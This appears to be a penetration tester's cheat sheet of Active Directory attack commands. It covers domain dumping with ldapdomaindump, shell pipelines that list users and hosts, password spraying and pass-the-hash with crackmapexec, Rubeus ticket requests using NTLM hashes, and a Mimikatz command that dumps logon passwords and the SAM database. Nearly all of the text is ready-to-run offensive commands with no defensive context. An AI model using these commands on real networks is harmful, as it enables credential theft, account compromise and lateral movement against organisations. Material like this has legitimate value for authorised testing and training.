Active Directory----

Dump Domain (needs AD User)----ldapdomaindump ldap://<domain> -u 'DOMAIN\user' -p 'password'

Return list of users----cat domain_users.grep | awk '{print $1}' > users.txt


Return list of computers + IPs----cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | egrep -v "^;" | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr [[:lower:]] [[:upper:]]

mkdir in a loop----for dir in $(cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | egrep -v "^;" | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr [[:lower:]] [[:upper:]]); do mkdir ~/$dir; done


Password Spraying----crackmapexec smb -u /path/to/users.txt -p /path/to/passwords.txt 192.168.0.0/24

Local Administrator Password----crackmapexec smb 192.168.0.0/24 -u Administrator --local-auth -H <NTLM:hash>

Remote Desktop----xfreerdp /u:DOMAIN\user /p:<pass> /v:<ip>
Rubeus (get TGT and apply to new process)----Rubeus.exe asktgt /user:<user> /rc4:<NTLM hash> /createnetonly:cmd.exe /show /domain:<domain> /dc:<dc-ip>

Mimikatz programmatically dump passwords----mimikatz.exe "privilege::debug" "log .\logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit